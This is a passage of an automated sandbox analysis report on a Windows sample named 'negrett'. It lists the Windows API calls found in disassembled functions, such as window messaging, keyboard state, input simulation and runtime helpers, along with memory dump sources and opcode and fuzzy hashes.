                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BA4271
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: msctls_trackbar32
                                                • API String ID: 3850602802-1010561917
                                                • Opcode ID: eeddd744ac79d9cf3cf3613ce262b0f7676746dad4f0d87f4d3853d9977ca9cb
                                                • Instruction ID: d73528818d9bc5d6735f2b1fe9f8b6432b65f43625cd842e47217bc13a24bd22
                                                • Opcode Fuzzy Hash: eeddd744ac79d9cf3cf3613ce262b0f7676746dad4f0d87f4d3853d9977ca9cb
                                                • Instruction Fuzzy Hash: 6711E331254248BEEF205E28CC46FAB3BECEF86B54F110524FA55E60A0D6B1DC519B50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 6afa368cd3e7c4108598805dd3060fa638451578f9be81892b4bfe554b6441f4
                                                • Instruction ID: 5e19bdab61d7d021c1cbfd1d1cf44c30fd9c72cb7b9bef5de19bda32e0685967
                                                • Opcode Fuzzy Hash: 6afa368cd3e7c4108598805dd3060fa638451578f9be81892b4bfe554b6441f4
                                                • Instruction Fuzzy Hash: BFC13772940305AFCB209F78BDD0BAA7BBAEF41350F1445AADA94D72D2EF319941CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 120a06077dbeccd10abe6c55daed01ae1394023aa0e4bdaac083276a7272cc92
                                                • Instruction ID: 9219158d29d71a532b97fde4d546222a40837fa5080bfd7fbb152d3119ee8155
                                                • Opcode Fuzzy Hash: 120a06077dbeccd10abe6c55daed01ae1394023aa0e4bdaac083276a7272cc92
                                                • Instruction Fuzzy Hash: D7C16975A1020AEFCB04DFA4C894AAEB7F5FF48304F218599E519EB291C731EE41CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: __alldvrm$_strrchr
                                                • String ID:
                                                • API String ID: 1036877536-0
                                                • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                • Instruction ID: f841ce63c88685a4712e1cab24239ad4bfe9ee70843b428d4708a0a55ae0819e
                                                • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                • Instruction Fuzzy Hash: FBA14172A003869FEF228F28E8D07AEBBE5EF51350F1841EDD5859B2C1CB799941CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1a429c879d0e0c11a062f5037e8e0557d84ca674edd92bd5450c4b7a15ab3dcd
                                                • Instruction ID: 17fa451d17c2124f59361b8464cb366ce4cc7d795cc42b99f6805965de797442
                                                • Opcode Fuzzy Hash: 1a429c879d0e0c11a062f5037e8e0557d84ca674edd92bd5450c4b7a15ab3dcd
                                                • Instruction Fuzzy Hash: 8CC1E574D04249AFCB21DFA8E8C0BADBBB1BF49310F044199E954A73D2CB799941CF69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ProgIDFromCLSID.OLE32(?,00000000), ref: 00B705F0
                                                • CoTaskMemFree.OLE32(00000000), ref: 00B70608
                                                • CLSIDFromProgID.OLE32(?,?), ref: 00B7062D
                                                • _memcmp.LIBVCRUNTIME ref: 00B7064E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: FromProg$FreeTask_memcmp
                                                • String ID:
                                                • API String ID: 314563124-0
                                                • Opcode ID: 9f6f1136656f48a1d5cc09182856f51b3f7b1dd8e5a6d9cd88923e05a5328a87
                                                • Instruction ID: dba9669c8f8fa2639d4f35243f3af4f8958c2a9e01927e0ac7282eb6986e8b20
                                                • Opcode Fuzzy Hash: 9f6f1136656f48a1d5cc09182856f51b3f7b1dd8e5a6d9cd88923e05a5328a87
                                                • Instruction Fuzzy Hash: AE812971A10109EFCB04DF94C984EEEB7F9FF89315F208599E516AB250DB71AE06CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID:
                                                • API String ID: 176396367-0
                                                • Opcode ID: c3e9567cea0411148a6a70b0996802892ed174e2126378ff82080f9ce06fe4ae
                                                • Instruction ID: 26b1455a1a5b88675c6fc450c09102267a77b0c62f255e0bbdd5918f98af417b
                                                • Opcode Fuzzy Hash: c3e9567cea0411148a6a70b0996802892ed174e2126378ff82080f9ce06fe4ae
                                                • Instruction Fuzzy Hash: 9F61CF72910215BBEB14DF64CC88BBEB7A8EF08B24F10415AF915D61D0DB78A980CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetWindowRect.USER32(00DE5240,?), ref: 00BA62E2
                                                • ScreenToClient.USER32(?,?), ref: 00BA6315
                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 00BA6382
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Window$ClientMoveRectScreen
                                                • String ID:
                                                • API String ID: 3880355969-0
                                                • Opcode ID: bae3703af2ca61054c8a49803018a228a03ec1b8995be1941bcb5dcd3cbd2dac
                                                • Instruction ID: 6d1dcbb95549d825d7a373e8c79ba96abea856f75679b9f3a144457077fca5ee
                                                • Opcode Fuzzy Hash: bae3703af2ca61054c8a49803018a228a03ec1b8995be1941bcb5dcd3cbd2dac
                                                • Instruction Fuzzy Hash: 12513DB4904249EFCF10DF58D881AAE7BF5EF46360F148199F9159B290DB30ED42CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 92300467f74a8ce655cf74ca6bdaee5cc0430d91273f78a41d58d6439cffd922
                                                • Instruction ID: fb966b66d10e1cb100d3b66d6f19b47d1f4245582ff2cd81f146bb66478b1e3a
                                                • Opcode Fuzzy Hash: 92300467f74a8ce655cf74ca6bdaee5cc0430d91273f78a41d58d6439cffd922
                                                • Instruction Fuzzy Hash: C0412971E40304AFD7249F78DC84BAABBE9EF84710F10862AE255DB6D1DB7199068BC4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 00B7ABF1
                                                • SetKeyboardState.USER32(00000080), ref: 00B7AC0D
                                                • PostMessageW.USER32 ref: 00B7AC74
                                                • SendInput.USER32(00000001,?,0000001C), ref: 00B7ACC6
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                • Opcode ID: 8e096dc66290e0510deea87fbee1cbf5793d281e6cf6e3bebadf2fa1eb2d4e1e
                                                • Instruction ID: afc6a178c2f0f7fd1227d3dd0a39b48895e6de5217ac1cb2179cd98fc4e7faf4
                                                • Opcode Fuzzy Hash: 8e096dc66290e0510deea87fbee1cbf5793d281e6cf6e3bebadf2fa1eb2d4e1e
                                                • Instruction Fuzzy Hash: A7311430A042187FEF66CB748C05BFE7BE5EBC9320F04C29AE4A9931D1C37499858792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 029EF4C6
                                                  • Part of subcall function 029EF4ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 029EF595
                                                  • Part of subcall function 029EF4ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 029EF5A0
                                                • ___scrt_fastfail.LIBCMT ref: 029EF4E7
                                                  • Part of subcall function 029EF4A3: __onexit.LIBCMT ref: 029EF4A9
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: __crt_fast_encode_pointer$___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                • String ID:
                                                • API String ID: 3435762107-0
                                                • Opcode ID: 7b55b6850c899a45e1c1216e6022cda955ea3dce2ceb4d0304ac77cf41e12fec
                                                • Instruction ID: af8ac2e24082af12998b8b2fd1119b5e76fef29cdac8d1b9229b02a116e50143
                                                • Opcode Fuzzy Hash: 7b55b6850c899a45e1c1216e6022cda955ea3dce2ceb4d0304ac77cf41e12fec
                                                • Instruction Fuzzy Hash: 7D21F6327457106BDF226FB4AC49B7937A8EB54B61F200237F807D7A90DF6498008E9C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetWindowLongW.USER32(?,000000EC), ref: 00BA280A
                                                • SetWindowLongW.USER32 ref: 00BA2824
                                                • SetWindowLongW.USER32 ref: 00BA2832
                                                • SetLayeredWindowAttributes.USER32 ref: 00BA2840
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Window$Long$AttributesLayered
                                                • String ID:
                                                • API String ID: 2169480361-0
                                                • Opcode ID: 81751e25e1dfd0766599a488746fb3f2dbd5638f8d22048539979cada08a9370
                                                • Instruction ID: 1830b7964b8e851fe7cee0b8d1d6c9448dca4776c7ea7b3ceaa9ba1b7c5bebbf
                                                • Opcode Fuzzy Hash: 81751e25e1dfd0766599a488746fb3f2dbd5638f8d22048539979cada08a9370
                                                • Instruction Fuzzy Hash: 5721D331608511AFD714DB28C845FAA7BD5EF46324F148198F4268B6E2CB75FD82CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 029F279E
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 029F27B7
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: Value___vcrt_
                                                • String ID:
                                                • API String ID: 1426506684-0
                                                • Opcode ID: 946f278fc3e31e727c81028ebb0495bff9378def4856718e2f28f762550e10d8
                                                • Instruction ID: ced12e47c3e75b6ff257e23d29169d4c6a1c68713413ef53e05e707fe5ee2233
                                                • Opcode Fuzzy Hash: 946f278fc3e31e727c81028ebb0495bff9378def4856718e2f28f762550e10d8
                                                • Instruction Fuzzy Hash: 80014233E493119EAAF127B5BCC4B672B99EB45778720023AFF24481F0EF1198028798
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 00B7E1FD
                                                • MessageBoxW.USER32 ref: 00B7E230
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B7E246
                                                • CloseHandle.KERNEL32(00000000), ref: 00B7E24D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                • String ID:
                                                • API String ID: 2880819207-0
                                                • Opcode ID: ad0550d49e6aa99fdaf688575352cd0cab6aa71aebafc21c73ffad3051d29086
                                                • Instruction ID: 00322601381a222e697275ce7e24c2fb63bad0ba2f191bd83226b7b1372e0831
                                                • Opcode Fuzzy Hash: ad0550d49e6aa99fdaf688575352cd0cab6aa71aebafc21c73ffad3051d29086
                                                • Instruction Fuzzy Hash: F811C876A04254BBC7019FAC9C45A9F7FEDDF45310F148695F939E7291DA70CD0487A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 029F2F56
                                                  • Part of subcall function 029F2EA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 029F2ED2
                                                  • Part of subcall function 029F2EA3: ___AdjustPointer.LIBCMT ref: 029F2EED
                                                • _UnwindNestedFrames.LIBCMT ref: 029F2F6B
                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 029F2F7C
                                                • CallCatchBlock.LIBVCRUNTIME ref: 029F2FA4
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                • String ID:
                                                • API String ID: 737400349-0
                                                • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                • Instruction ID: 64ed645ad70230afd54025f6361c49422815352485f5ddcb9914bfedc77b26ee
                                                • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                • Instruction Fuzzy Hash: 79011732500148BBDF92AF95CC45EEB7F6AEF98754F054014FF08A6120C336E861AFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32 ref: 00B1604C
                                                • GetStockObject.GDI32(00000011), ref: 00B16060
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B1606A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: CreateMessageObjectSendStockWindow
                                                • String ID:
                                                • API String ID: 3970641297-0
                                                • Opcode ID: 28b3b306bae44cdda6d1a628b2faf42f25e4684c7a3ac29ebe273579e877d415
                                                • Instruction ID: 46d261516242b44cc024135ddf8a21be4fb1cf6ea6adf56bb912de30bc68f3a0
                                                • Opcode Fuzzy Hash: 28b3b306bae44cdda6d1a628b2faf42f25e4684c7a3ac29ebe273579e877d415
                                                • Instruction Fuzzy Hash: BD116D72501548BFEF168FA49C89EEABFADEF0D3A4F440255FA1552110DB329CA0DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B72DC5
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B72DD6
                                                • GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000), ref: 00B72DDD
                                                • AttachThreadInput.USER32(00000000,?,00000000), ref: 00B72DE4
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                • String ID:
                                                • API String ID: 2710830443-0
                                                • Opcode ID: 7b3d13f033925819e00513fc7897a10c1684abe3cbea9974daebee04515bcf55
                                                • Instruction ID: 180856e6beedc7f777081a3470dc003491b0e7451c543163cbf2cf5893232f2e
                                                • Opcode Fuzzy Hash: 7b3d13f033925819e00513fc7897a10c1684abe3cbea9974daebee04515bcf55
                                                • Instruction Fuzzy Hash: A0E092716012247BD7305B769C0EFEB3EACEF43BA1F104065F509D30809EA0C840D6B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B29639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00B29693
                                                  • Part of subcall function 00B29639: SelectObject.GDI32(?,00000000), ref: 00B296A2
                                                  • Part of subcall function 00B29639: BeginPath.GDI32(?), ref: 00B296B9
                                                  • Part of subcall function 00B29639: SelectObject.GDI32(?,00000000), ref: 00B296E2
                                                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00BA8887
                                                • LineTo.GDI32(?,?,?), ref: 00BA8894
                                                • EndPath.GDI32(?), ref: 00BA88A4
                                                • StrokePath.GDI32(?), ref: 00BA88B2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                • String ID:
                                                • API String ID: 1539411459-0
                                                • Opcode ID: 586ada54fc70ba74319543e4c670c18955cdaf761a282e92be6d1f3ec78aa08d
                                                • Instruction ID: 3d5da0404f0c85c30ee6955297f731b3cdb9d3582c35eccb9a62a81dfdd1ffed
                                                • Opcode Fuzzy Hash: 586ada54fc70ba74319543e4c670c18955cdaf761a282e92be6d1f3ec78aa08d
                                                • Instruction Fuzzy Hash: 26F03A36045258BADB225F94AC0EFCE3E99AF06310F548040FA11660E2CF795511CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 029D6A20: _wcslen.LIBCMT ref: 029D6A25
                                                  • Part of subcall function 029D5F57: _wcslen.LIBCMT ref: 029D5F6A
                                                • _wcslen.LIBCMT ref: 02A48906
                                                • _wcslen.LIBCMT ref: 02A4892D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID: X
                                                • API String ID: 176396367-3081909835
                                                • Opcode ID: 2cd2e29e906c3bffebd332faea78e62c59c39445b1535c3da010f19e2b38c6d9
                                                • Instruction ID: 5aa3a6ab14389617cf1d92bb1a2e982bfc9661f1ba089d92d6a53339ec4a3c32
                                                • Opcode Fuzzy Hash: 2cd2e29e906c3bffebd332faea78e62c59c39445b1535c3da010f19e2b38c6d9
                                                • Instruction Fuzzy Hash: 64E16831A04340CFD724EF24D880A6AB7E6BFC4354F14896DE8899B2A1DF35E905CF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "$'
                                                • API String ID: 0-2422873937
                                                • Opcode ID: d93b0d9a50323905c636a341ba488681d99ee594726b78776deaff5ddd4a418f
                                                • Instruction ID: 371d6e0b021dbf4819816871698482cae3d6b25d345c0c444a4cfc5c81241149
                                                • Opcode Fuzzy Hash: d93b0d9a50323905c636a341ba488681d99ee594726b78776deaff5ddd4a418f
                                                • Instruction Fuzzy Hash: 62811771640205BBCF61AF64EC41FEE3BAEBF48354F048029F906AB181EB74DA45DB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
